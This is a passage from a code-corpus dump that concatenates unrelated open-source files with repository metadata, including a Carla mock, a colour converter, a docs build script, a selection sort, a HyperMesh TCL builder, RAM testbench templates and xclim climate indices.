**kwargs
)
| 1.898438 | 2 |
tests/mocked_carla.py | fangedward/pylot | 0 | 3389 | # This module provides mocked versions of classes and functions provided
# by Carla in our runtime environment.
class Location(object):
""" A mock class for carla.Location. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
class Rotation(object):
""" A mock class for carla.Rotation. """
def __init__(self, pitch, yaw, roll):
self.pitch = pitch
self.yaw = yaw
self.roll = roll
class Vector3D(object):
""" A mock class for carla.Vector3D. """
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
| 3.109375 | 3 |
rgb_to_cmyk.py | Zweizack/fuzzy-rainbow | 0 | 3390 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
ee = '\033[1m'
green = '\033[32m'
yellow = '\033[33m'
cyan = '\033[36m'
line = cyan+'-' * 0x2D
print(ee+line)
R,G,B = [float(X) / 0xFF for X in input(f'{yellow}RGB: {green}').split()]
K = 1-max(R,G,B)
C,M,Y = [round(float((1-X-K)/(1-K) * 0x64),1) for X in [R,G,B]]
K = round(K * 0x64,1)
print(f'{yellow}CMYK: {green}{C}%, {M}%, {Y}%, {K}%')
print(line)
| 2.9375 | 3 |
docs/updatedoc.py | JukeboxPipeline/jukedj | 2 | 3391 | <gh_stars>1-10
#!/usr/bin/env python
"""Builds the documentaion. First it runs gendoc to create rst files for the source code. Then it runs sphinx make.
.. Warning:: This will delete the content of the output directory first! So you might loose data.
You can use updatedoc.py -nod.
Usage, just call::
updatedoc.py -h
"""
import argparse
import os
import shutil
import sys
import gendoc
thisdir = os.path.abspath(os.path.dirname(__file__))
def setup_argparse():
"""Sets up the argument parser and returns it
:returns: the parser
:rtype: :class:`argparse.ArgumentParser`
:raises: None
"""
parser = argparse.ArgumentParser(
description="Builds the documentaion. First it runs gendoc to create rst files\
for the source code. Then it runs sphinx make.\
WARNING: this will delete the contents of the output dirs. You can use -nod.")
ipath = os.path.join(thisdir, '../src')
ipath = os.path.abspath(ipath)
idefault = [ipath]
parser.add_argument('-i', '--input', nargs='+', default=idefault,
help='list of input directories. gendoc is called for every\
source dir.\
Default is \'%s\'.' % ', '.join(idefault))
opath = os.path.join(thisdir, 'reference')
opath = os.path.abspath(opath)
odefault = [opath]
parser.add_argument('-o', '--output', nargs='+', default=odefault,
help='list of output directories. if you have multiple source\
directories, the corresponding output directorie is used.\
if there are less dirs than for source, the last output dir\
is used for the remaining source dirs.\
WARNING: the output directories are emptied by default. See -nod.\
Default is \'%s\'.' % ', '.join(odefault))
gadefault = ['-T', '-f', '-e', '-o']
parser.add_argument('-ga', '--gendocargs', nargs='*', default=gadefault,
help="list of arguments to pass to gendoc. use -gh for info.\
Default is \'%s\'" % ', '.join(gadefault))
parser.add_argument('-nod', '--nodelete', action='store_true',
help='Do not empty the output directories first.')
parser.add_argument('-gh', '--gendochelp', action='store_true',
help='print the help for gendoc and exit')
return parser
def prepare_dir(directory, delete=True):
"""Create apidoc dir, delete contents if delete is True.
:param directory: the apidoc directory. you can use relative paths here
:type directory: str
:param delete: if True, deletes the contents of apidoc. This acts like an override switch.
:type delete: bool
:returns: None
:rtype: None
:raises: None
"""
if os.path.exists(directory):
if delete:
assert directory != thisdir, 'Trying to delete docs! Specify other output dir!'
print 'Deleting %s' % directory
shutil.rmtree(directory)
print 'Creating %s' % directory
os.mkdir(directory)
else:
print 'Creating %s' % directory
os.mkdir(directory)
def run_gendoc(source, dest, args):
"""Starts gendoc which reads source and creates rst files in dest with the given args.
:param source: The python source directory for gendoc. Can be a relative path.
:type source: str
:param dest: The destination for the rst files. Can be a relative path.
:type dest: str
:param args: Arguments for gendoc. See gendoc for more information.
:type args: list
:returns: None
:rtype: None
:raises: SystemExit
"""
args.insert(0, 'gendoc.py')
args.append(dest)
args.append(source)
print 'Running gendoc.main with: %s' % args
gendoc.main(args)
def main(argv=sys.argv[1:]):
"""Parse commandline arguments and run the tool
:param argv: the commandline arguments.
:type argv: list
:returns: None
:rtype: None
:raises: None
"""
parser = setup_argparse()
args = parser.parse_args(argv)
if args.gendochelp:
sys.argv[0] = 'gendoc.py'
genparser = gendoc.setup_parser()
genparser.print_help()
sys.exit(0)
print 'Preparing output directories'
print '='*80
for odir in args.output:
prepare_dir(odir, not args.nodelete)
print '\nRunning gendoc'
print '='*80
for i, idir in enumerate(args.input):
if i >= len(args.output):
odir = args.output[-1]
else:
odir = args.output[i]
run_gendoc(idir, odir, args.gendocargs)
if __name__ == '__main__':
main() | 2.3125 | 2 |
sort/selectionsort.py | vitormrts/sorting-algorithms | 0 | 3392 | def selection_sort(A): # O(n^2)
n = len(A)
for i in range(n-1): # percorre a lista
min = i
for j in range(i+1, n): # encontra o menor elemento da lista a partir de i + 1
if A[j] < A[min]:
min = j
A[i], A[min] = A[min], A[i] # insere o elemento na posicao correta
return A
# 1 + (n-1)*[3 + X] = 1 + 3*(n-1) + X*(n-1) = 1 + 3*(n-1) + (n^2 + n - 2)/2
# = (1 - 3 - 1) + (3n + n/2) + (n^2/2)
# The complexity is O(n^2) | 3.796875 | 4 |
BridgeOptimizer/scriptBuilder/ScriptBuilderBoundaryConditions.py | manuel1618/bridgeOptimizer | 1 | 3393 | import os
from typing import List, Tuple
from BridgeOptimizer.datastructure.hypermesh.LoadCollector import LoadCollector
from BridgeOptimizer.datastructure.hypermesh.LoadStep import LoadStep
from BridgeOptimizer.datastructure.hypermesh.Force import Force
from BridgeOptimizer.datastructure.hypermesh.SPC import SPC
class ScriptBuilderBoundaryConditions:
"""
Extra class for generating Loadstep, Loadcollectors, Forces and Constraints
Parameters:
---------
None
"""
def __init__(self) -> None:
pass
def write_tcl_commands_loadCollectors(self, tcl_commands: List) -> None:
"""
Creates all the load collectors (has to be done before creating loadsteps, as the loadcollectors are referenced)
"""
load_collector: LoadCollector = None
# create all load collectors and loads first
for load_collector in LoadCollector.instances:
load_collector_type = load_collector.get_load_collector_type()
load_collector.name = f"{str(load_collector_type.__name__)}_{str(load_collector.get_id())}"
tcl_commands.append(
f"*createentity loadcols includeid=0 name=\"{load_collector.name}\"")
# create loads
for load in load_collector.loads:
if load_collector_type == Force:
force: Force = load
tcl_commands.append(
f"*createmark nodes 1 {' '.join([str(x) for x in force.nodeIds])}")
tcl_commands.append(
f"*loadcreateonentity_curve nodes 1 1 1 {force.x} {force.y} {force.z} 0 {force.x} {force.y} {force.z} 0 0 0 0")
elif load_collector_type == SPC:
spc: SPC = load
tcl_commands.append(
f"*createmark nodes 1 {' '.join([str(x) for x in spc.nodeIds])}")
tcl_commands.append(
f"*loadcreateonentity_curve nodes 1 3 1 {spc.dofs[0]} {spc.dofs[1]} {spc.dofs[2]} {spc.dofs[3]} {spc.dofs[4]} {spc.dofs[5]} 0 0 0 0 0")
tcl_commands.append("*createmark loads 0 1")
tcl_commands.append("*loadsupdatefixedvalue 0 0")
def write_tcl_commands_loadsteps(self, tcl_commands: List) -> None:
"""
Single method to write all tcl commands to the file
"""
self.write_tcl_commands_loadCollectors(tcl_commands)
# create the load step
load_step: LoadStep = None
for load_step in LoadStep.instances:
load_step_id = str(load_step.get_id())
# TODO: should be possible to just use a spc collector - not possible rn.
spc_loadCollector = load_step.spc_loadCollector
load_loadCollector = load_step.load_loadCollector
spc_loadCollector_id = str(spc_loadCollector.get_id())
load_loadCollector_id = str(load_loadCollector.get_id())
tcl_commands.append(
f"*createmark loadcols 1 \"{spc_loadCollector.name}\" \"{load_loadCollector.name}\"")
tcl_commands.append("*createmark outputblocks 1")
tcl_commands.append("*createmark groups 1")
tcl_commands.append(
f"*loadstepscreate \"loadstep_{load_step_id}\" 1")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 4143 1 1 0 1")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 4709 1 1 0 1")
tcl_commands.append(
f"*setvalue loadsteps id={load_step_id} STATUS=2 4059=1 4060=STATICS")
tcl_commands.append(
f"*attributeupdateentity loadsteps {load_step_id} 4145 1 1 0 loadcols {spc_loadCollector_id}")
tcl_commands.append(
f"*attributeupdateentity loadsteps {load_step_id} 4147 1 1 0 loadcols {load_loadCollector_id}")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 3800 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 707 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 2396 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 8134 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 2160 1 1 0 0")
tcl_commands.append(
f"*attributeupdateint loadsteps {load_step_id} 10212 1 1 0 0")
| 2.078125 | 2 |
Lekcija08/script01.py | islamspahic/python-uup | 0 | 3394 | tajniBroj = 51
broj = 2
while tajniBroj != broj:
broj = int(input("Pogodite tajni broj: "))
if tajniBroj == broj:
print("Pogodak!")
elif tajniBroj < broj:
print("Tajni broj je manji od tog broja.")
else:
print("Tajni broj je veci od tog broja.")
print("Kraj programa")
| 3.6875 | 4 |
tests/algorithms/memory/test_cmac.py | FrostByte266/neupy | 801 | 3395 | <gh_stars>100-1000
import numpy as np
from sklearn import metrics
from neupy import algorithms
from base import BaseTestCase
class CMACTestCase(BaseTestCase):
def test_cmac(self):
X_train = np.reshape(np.linspace(0, 2 * np.pi, 100), (100, 1))
X_train_before = X_train.copy()
X_test = np.reshape(np.linspace(np.pi, 2 * np.pi, 50), (50, 1))
y_train = np.sin(X_train)
y_train_before = y_train.copy()
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
verbose=False,
)
cmac.train(X_train, y_train, epochs=100)
predicted_test = cmac.predict(X_test)
predicted_test = predicted_test.reshape((len(predicted_test), 1))
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0.0024, places=4)
# Test that algorithm didn't modify data samples
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(X_train, X_train_before)
np.testing.assert_array_equal(y_train, y_train_before)
self.assertPickledNetwork(cmac, X_train)
def test_train_different_inputs(self):
self.assertInvalidVectorTrain(
network=algorithms.CMAC(),
input_vector=np.array([1, 2, 3]),
target=np.array([1, 2, 3])
)
def test_predict_different_inputs(self):
cmac = algorithms.CMAC()
data = np.array([[1, 2, 3]]).T
target = np.array([[1, 2, 3]]).T
cmac.train(data, target, epochs=100)
self.assertInvalidVectorPred(
network=cmac,
input_vector=np.array([1, 2, 3]),
target=target,
decimal=2
)
def test_cmac_multi_output(self):
X_train = np.linspace(0, 2 * np.pi, 100)
X_train = np.vstack([X_train, X_train])
X_test = np.linspace(0, 2 * np.pi, 100)
X_test = np.vstack([X_test, X_test])
y_train = np.sin(X_train)
y_test = np.sin(X_test)
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
cmac.train(X_train, y_train,
X_test, y_test, epochs=100)
predicted_test = cmac.predict(X_test)
error = metrics.mean_absolute_error(y_test, predicted_test)
self.assertAlmostEqual(error, 0, places=6)
def test_cmac_training_exceptions(self):
cmac = algorithms.CMAC(
quantization=100,
associative_unit_size=32,
step=0.2,
)
with self.assertRaises(ValueError):
cmac.train(X_train=True, y_train=True,
X_test=None, y_test=True)
| 2.171875 | 2 |
src/ggrc_workflows/models/task_group_object.py | Smotko/ggrc-core | 0 | 3396 | # Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: <EMAIL>
# Maintained By: <EMAIL>
from sqlalchemy.ext.associationproxy import association_proxy
from ggrc import db
from ggrc.models.mixins import Mapping
from ggrc.models.mixins import Timeboxed
from ggrc.models.reflection import PublishOnly
class TaskGroupObject(Timeboxed, Mapping, db.Model):
__tablename__ = 'task_group_objects'
task_group_id = db.Column(
db.Integer, db.ForeignKey('task_groups.id'), nullable=False)
object_id = db.Column(db.Integer, nullable=False)
object_type = db.Column(db.String, nullable=False)
@property
def object_attr(self):
return '{0}_object'.format(self.object_type)
@property
def object(self):
return getattr(self, self.object_attr)
@object.setter
def object(self, value):
self.object_id = value.id if value is not None else None
self.object_type = value.__class__.__name__ if value is not None \
else None
return setattr(self, self.object_attr, value)
@staticmethod
def _extra_table_args(cls):
return (
db.UniqueConstraint('task_group_id', 'object_id', 'object_type'),
db.Index('ix_task_group_id', 'task_group_id'),
)
_publish_attrs = [
'task_group',
'object',
]
_sanitize_html = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupObject, cls).eager_query()
return query.options(
orm.subqueryload('task_group'))
def _display_name(self):
return self.object.display_name + '<->' + self.task_group.display_name
def copy(self, _other=None, **kwargs):
columns = [
'task_group', 'object_id', 'object_type'
]
target = self.copy_into(_other, columns, **kwargs)
return target
class TaskGroupable(object):
@classmethod
def late_init_task_groupable(cls):
def make_task_group_objects(cls):
cls.task_groups = association_proxy(
'task_group_objects', 'task_group',
creator=lambda task_group: TaskGroupObject(
task_group=task_group,
object_type=cls.__name__,
)
)
joinstr = 'and_(foreign(TaskGroupObject.object_id) == {type}.id, '\
'foreign(TaskGroupObject.object_type) == "{type}")'
joinstr = joinstr.format(type=cls.__name__)
return db.relationship(
'TaskGroupObject',
primaryjoin=joinstr,
backref='{0}_object'.format(cls.__name__),
cascade='all, delete-orphan',
)
cls.task_group_objects = make_task_group_objects(cls)
_publish_attrs = [
PublishOnly('task_groups'),
'task_group_objects',
]
_include_links = []
@classmethod
def eager_query(cls):
from sqlalchemy import orm
query = super(TaskGroupable, cls).eager_query()
return cls.eager_inclusions(query, TaskGroupable._include_links).options(
orm.subqueryload('task_group_objects'))
| 1.898438 | 2 |
verification/tb_template.py | ahmednofal/DFFRAM | 0 | 3397 | # Copyright ©2020-2021 The American University in Cairo and the Cloud V Project.
#
# This file is part of the DFFRAM Memory Compiler.
# See https://github.com/Cloud-V/DFFRAM for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
RAM_instantiation = """
/*
An auto generated testbench to verify RAM{word_num}x{word_size}
Authors: <NAME> (<EMAIL>)
<NAME> (<EMAIL>)
*/
`define VERBOSE_1
`define VERBOSE_2
`define UNIT_DELAY #1
`define USE_LATCH 1
`define SIZE {word_size}/8
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v"
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v"
// // Temporary override: IcarusVerilog cannot read these for some reason ^
`include "hd_primitives.v"
`include "hd_functional.v"
`include "{filename}"
module tb_RAM{word_num}x{word_size};
localparam SIZE = `SIZE;
localparam A_W = {addr_width}+$clog2(SIZE);
localparam M_SZ = 2**A_W;
reg CLK;
reg [(SIZE-1):0] WE0;
reg EN0;
reg [(SIZE*8-1):0] Di0;
wire [(SIZE*8-1):0] Do0;
reg [A_W-1:0] A0, ADDR;
reg [7:0] Phase;
reg [7:0] RANDOM_BYTE;
event done;
RAM{word_num} #(.USE_LATCH(`USE_LATCH), .WSIZE(SIZE)) SRAM (
.CLK(CLK),
.WE0(WE0),
.EN0(EN0),
.Di0(Di0),
.Do(Do0),
.A0(A0[A_W-1:$clog2(SIZE)])
);
initial begin
$dumpfile("tb_RAM{word_num}x{word_size}.vcd");
$dumpvars(0, tb_RAM{word_num}x{word_size});
@(done) $finish;
end
/* Memory golden Model */
reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0];
reg [(SIZE*8-1):0] RAM_DATA_RW;
genvar c;
generate
for (c=0; c < SIZE; c = c+1) begin: mem_golden_model
always @(posedge CLK) begin
if(EN0) begin
RAM_DATA_RW <= RAM[A0/SIZE];
if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c];
end
end
end
endgenerate
"""
begin_single_ported_test = """
initial begin
CLK = 0;
WE0 = 0;
EN0 = 1;
"""
single_ported_custom_test = """
Phase = 0;
// Perform a single word write then read
mem_write_word({{SIZE{{8'h90}}}}, 4);
mem_read_word_0(4);
"""
RAM_instantiation_1RW1R = """
/*
An auto generated testbench to verify RAM{word_num}x{word_size}
Authors: <NAME> (<EMAIL>)
<NAME> (<EMAIL>)
*/
`define VERBOSE_1
`define VERBOSE_2
`define UNIT_DELAY #1
`define USE_LATCH 1
`define SIZE {word_size}/8
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/primitives.v"
//`include "{pdk_root}/sky130A/libs.ref/sky130_fd_sc_hd/verilog/sky130_fd_sc_hd.v"
// // Temporary override: IcarusVerilog cannot read these for some reason ^
`include "hd_primitives.v"
`include "hd_functional.v"
`include "{filename}"
module tb_RAM{word_num}x{word_size}_1RW1R;
localparam SIZE = `SIZE;
localparam A_W = {addr_width}+$clog2(SIZE);
localparam M_SZ = 2**A_W;
reg CLK;
reg [(SIZE-1):0] WE0;
reg EN0;
reg ENR;
reg [(SIZE*8-1):0] Di0;
wire [(SIZE*8-1):0] Do0;
wire [(SIZE*8-1):0] Do1;
reg [A_W-1:0] A0, A1, ADDR;
reg [7:0] Phase;
reg [7:0] RANDOM_BYTE;
event done;
RAM{word_num}_1RW1R #(.USE_LATCH(`USE_LATCH), .WSIZE(`SIZE)) SRAM (
.CLK(CLK),
.WE0(WE0),
.EN0(EN0),
.EN1(ENR),
.Di0(Di0),
.Do0(Do0),
.Do1(Do1),
.A0(A0[A_W-1:$clog2(SIZE)]),
.A1(A1[A_W-1:$clog2(SIZE)])
);
initial begin
$dumpfile("tb_RAM{word_num}x{word_size}_1RW1R.vcd");
$dumpvars(0, tb_RAM{word_num}x{word_size}_1RW1R);
@(done) $finish;
end
/* Memory golden Model */
reg [(SIZE*8-1):0] RAM[(M_SZ)-1 : 0];
reg [(SIZE*8-1):0] RAM_DATA_RW;
reg [(SIZE*8-1):0] RAM_DATA_R;
genvar c;
generate
for (c=0; c < SIZE; c = c+1) begin: mem_golden_model
always @(posedge CLK) begin
if(EN0) begin
RAM_DATA_RW <= RAM[A0/SIZE];
if(WE0[c]) RAM[A0/SIZE][8*(c+1)-1:8*c] <= Di0[8*(c+1)-1:8*c];
end
if (ENR) begin
RAM_DATA_R <= RAM[A1/SIZE];
end
end
end
endgenerate
"""
begin_dual_ported_test = """
initial begin
CLK = 0;
WE0 = 0;
EN0 = 1;
ENR = 1;
"""
dual_ported_custom_test = """
Phase = 0;
// Perform a 2 word write then read 2 words
mem_write_word({{SIZE{{8'h90}}}}, 4);
mem_write_word({{SIZE{{8'h33}}}}, 8);
mem_read_2words(4,8);
"""
start_test_common = """
always #10 CLK = !CLK;
integer i;
"""
test_port_1RW1R = """
/***********************************************************
Write and read from different ports
************************************************************/
// Fill the memory with a known pattern
// Word Write then Read
Phase = 1;
`ifdef VERBOSE_1
$display("\\nFinished Phase 0, starting Phase 1");
`endif
for(i=0; i<M_SZ; i=i+SIZE) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ;
RANDOM_BYTE = $urandom;
mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR);
mem_read_word_1( ADDR );
end
// HWord Write then Read
Phase = 2;
`ifdef VERBOSE_1
$display("\\nFinished Phase 1, starting Phase 2");
`endif
for(i=0; i<M_SZ; i=i+SIZE/2) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE;
RANDOM_BYTE = $urandom;
mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR);
mem_read_word_1( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
// Byte Write then Read
Phase = 3;
`ifdef VERBOSE_1
$display("\\nFinished Phase 2, starting Phase 3");
`endif
for(i=0; i<M_SZ; i=i+1) begin
ADDR = (($urandom%M_SZ));
mem_write_byte($urandom%255, ADDR);
mem_read_word_1(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
"""
test_port_RW = """
/***********************************************************
Write and read from same port
************************************************************/
Phase = 4;
`ifdef VERBOSE_1
$display("\\nFinished Phase 3, starting Phase 4");
`endif
for(i=0; i<M_SZ; i=i+SIZE) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFC ;
RANDOM_BYTE = $urandom;
mem_write_word( {SIZE{RANDOM_BYTE}}, ADDR);
mem_read_word_0( ADDR );
end
// HWord Write then Read
Phase = 5;
`ifdef VERBOSE_1
$display("\\nFinished Phase 4, starting Phase 5");
`endif
for(i=0; i<M_SZ; i=i+SIZE/2) begin
ADDR = (($urandom%M_SZ)) & 'hFFFF_FFFE;
RANDOM_BYTE = $urandom;
mem_write_hword( {SIZE/2{RANDOM_BYTE}}, ADDR);
mem_read_word_0( ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
// Byte Write then Read
Phase = 6;
`ifdef VERBOSE_1
$display("\\nFinished Phase 5, starting Phase 6");
`endif
for(i=0; i<M_SZ; i=i+1) begin
ADDR = (($urandom%M_SZ));
mem_write_byte($urandom%255, ADDR);
mem_read_word_0(ADDR & {{SIZE-1{8'hFF}}, 8'hFC} );
end
$display ("\\n>> Test Passed! <<\\n");
-> done;
"""
end_test = """
end
"""
tasks = """
task mem_write_byte(input [7:0] byte, input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;//[A_WIDTH:2];
WE0 = (1 << addr[$clog2(SIZE)-1:0]);
Di0 = (byte << (addr[$clog2(SIZE)-1:0] * 8));
@(posedge CLK);
`ifdef VERBOSE_2
$display("WRITE BYTE: 0x%X to %0X(%0D) (0x%X, %B)", byte, addr, addr, Di0, WE0);
`endif
WE0 = {SIZE{8'h00}};
end
endtask
task mem_write_hword(input [SIZE*8-1:0] hword, input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;//[A_WIDTH:$clog2(SIZE)];
WE0 = {{SIZE/2{addr[$clog2(SIZE)-1]}},{SIZE/2{~addr[$clog2(SIZE)-1]}}};
Di0 = (hword << (addr[$clog2(SIZE)-1] * (SIZE/2)*8));
@(posedge CLK);
`ifdef VERBOSE_2
$display("WRITE HWORD: 0x%X to %0X(%0D) (0x%X, %B)", hword, addr, addr, Di0, WE0);
`endif
WE0 = {SIZE{8'h00}};
end
endtask
task mem_write_word(input [SIZE*8-1:0] word, input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;
WE0 = {SIZE{8'hFF}};
Di0 = word;
@(posedge CLK);
`ifdef VERBOSE_2
$display("WRITE WORD: 0x%X to %0X(%0D) (0x%X, %B)", word, addr, addr, Di0, WE0);
`endif
WE0 = {SIZE{8'h00}};
end
endtask
task mem_read_word_0(input [A_W-1:0] addr);
begin
@(posedge CLK);
A0 = addr;//[9:2];
WE0 = {SIZE{8'h00}};
@(posedge CLK);
#5;
`ifdef VERBOSE_2
$display("READ WORD: 0x%X from %0D", Do0, addr);
`endif
check0();
end
endtask
task check0; begin
if(RAM_DATA_RW !== Do0) begin
$display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i);
$display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A0, Do0, RAM[A0/SIZE]);
$fatal(1);
end
end
endtask
"""
dual_ported_tasks = """
task mem_read_2words(input [A_W-1:0] addr0,
input [A_W-1:0] addr1);
begin
@(posedge CLK);
A0= addr0;//[9:2];
A1= addr1;//[9:2];
WE0 = {SIZE{8'h00}};
@(posedge CLK);
#5;
`ifdef VERBOSE_2
$display("READ WORD0: 0x%X from %0D", Do0, addr0);
$display("READ WORD1: 0x%X from %0D", Do1, addr1);
`endif
check0();
check1();
end
endtask
task mem_read_word_1(input [A_W-1:0] addr);
begin
@(posedge CLK);
A1 = addr;//[9:2];
WE0 = {SIZE{8'h00}};
@(posedge CLK);
#5;
`ifdef VERBOSE_2
$display("READ WORD: 0x%X from %0D", Do1, addr);
`endif
check1();
end
endtask
task check1; begin
if(RAM_DATA_R !== Do1) begin
$display("\\n>>Test Failed! <<\\t(Phase: %0d, Iteration: %0d", Phase, i);
$display("Address: 0x%X, READ: 0x%X - Should be: 0x%X", A1, Do1, RAM[A1/SIZE]);
$fatal(1);
end
end
endtask
"""
endmodule = """
endmodule
"""
| 1.890625 | 2 |
services/stocks-api/app/api/clients/coinbase/CoinbaseResponse.py | krystianbajno/stocks | 3 | 3398 | <reponame>krystianbajno/stocks<filename>services/stocks-api/app/api/clients/coinbase/CoinbaseResponse.py<gh_stars>1-10
class CoinbaseResponse:
bid = 0
ask = 0
product_id = None
def set_bid(self, bid):
self.bid = float(bid)
def get_bid(self):
return self.bid
def set_ask(self, ask):
self.ask = float(ask)
def get_ask(self):
return self.ask
def get_product_id(self):
return self.product_id
def set_product_id(self, product_id):
self.product_id = product_id
| 2.46875 | 2 |
xclim/indices/_anuclim.py | bzah/xclim | 1 | 3399 | # noqa: D100
from typing import Optional
import numpy as np
import xarray
from xclim.core.units import (
convert_units_to,
declare_units,
pint_multiply,
rate2amount,
units,
units2pint,
)
from xclim.core.utils import ensure_chunk_size
from ._multivariate import (
daily_temperature_range,
extreme_temperature_range,
precip_accumulation,
)
from ._simple import tg_mean
from .generic import select_resample_op
from .run_length import lazy_indexing
# Frequencies : YS: year start, QS-DEC: seasons starting in december, MS: month start
# See http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases
# -------------------------------------------------- #
# ATTENTION: ASSUME ALL INDICES WRONG UNTIL TESTED ! #
# -------------------------------------------------- #
__all__ = [
"temperature_seasonality",
"precip_seasonality",
"tg_mean_warmcold_quarter",
"tg_mean_wetdry_quarter",
"prcptot_wetdry_quarter",
"prcptot_warmcold_quarter",
"prcptot",
"prcptot_wetdry_period",
"isothermality",
]
_xr_argops = {
"wettest": xarray.DataArray.argmax,
"warmest": xarray.DataArray.argmax,
"dryest": xarray.DataArray.argmin,
"driest": xarray.DataArray.argmin,
"coldest": xarray.DataArray.argmin,
}
_np_ops = {
"wettest": "max",
"warmest": "max",
"dryest": "min",
"driest": "min",
"coldest": "min",
}
@declare_units(tasmin="[temperature]", tasmax="[temperature]")
def isothermality(
tasmin: xarray.DataArray, tasmax: xarray.DataArray, freq: str = "YS"
) -> xarray.DataArray:
r"""Isothermality.
The mean diurnal range divided by the annual temperature range.
Parameters
----------
tasmin : xarray.DataArray
Average daily minimum temperature at daily, weekly, or monthly frequency.
tasmax : xarray.DataArray
Average daily maximum temperature at daily, weekly, or monthly frequency.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [%]
Isothermality
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the output with input data with daily frequency as well. As such weekly or monthly input values, if desired, should
be calculated prior to calling the function.
"""
dtr = daily_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
etr = extreme_temperature_range(tasmin=tasmin, tasmax=tasmax, freq=freq)
with xarray.set_options(keep_attrs=True):
iso = dtr / etr * 100
iso.attrs["units"] = "%"
return iso
@declare_units(tas="[temperature]")
def temperature_seasonality(tas: xarray.DataArray) -> xarray.DataArray:
r"""ANUCLIM temperature seasonality (coefficient of variation).
The annual temperature coefficient of variation expressed in percent. Calculated as the standard deviation
of temperature values for a given year expressed as a percentage of the mean of those temperatures.
Parameters
----------
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
Returns
-------
xarray.DataArray, [%]
Mean temperature coefficient of variation
Examples
--------
The following would compute for each grid cell of file `tas.day.nc` the annual temperature seasonality:
>>> import xclim.indices as xci
>>> t = xr.open_dataset(path_to_tas_file).tas
>>> tday_seasonality = xci.temperature_seasonality(t)
>>> t_weekly = xci.tg_mean(t, freq='7D')
>>> tweek_seasonality = xci.temperature_seasonality(t_weekly)
Notes
-----
For this calculation, the mean in degrees Kelvin is used. This avoids the possibility of having to
divide by zero, but it does mean that the values are usually quite small.
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired, should be
calculated prior to calling the function.
"""
tas = convert_units_to(tas, "K")
with xarray.set_options(keep_attrs=True):
seas = 100 * _anuclim_coeff_var(tas)
seas.attrs["units"] = "%"
return seas
@declare_units(pr="[precipitation]")
def precip_seasonality(
pr: xarray.DataArray,
) -> xarray.DataArray:
r"""ANUCLIM Precipitation Seasonality (C of V).
The annual precipitation Coefficient of Variation (C of V) expressed in percent. Calculated as the standard deviation
of precipitation values for a given year expressed as a percentage of the mean of those values.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
Units need to be defined as a rate (e.g. mm d-1, mm week-1).
Returns
-------
xarray.DataArray, [%]
Precipitation coefficient of variation
Examples
--------
The following would compute for each grid cell of file `pr.day.nc` the annual precipitation seasonality:
>>> import xclim.indices as xci
>>> p = xr.open_dataset(path_to_pr_file).pr
>>> pday_seasonality = xci.precip_seasonality(p)
>>> p_weekly = xci.precip_accumulation(p, freq='7D')
# Input units need to be a rate
>>> p_weekly.attrs['units'] = "mm/week"
>>> pweek_seasonality = xci.precip_seasonality(p_weekly)
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
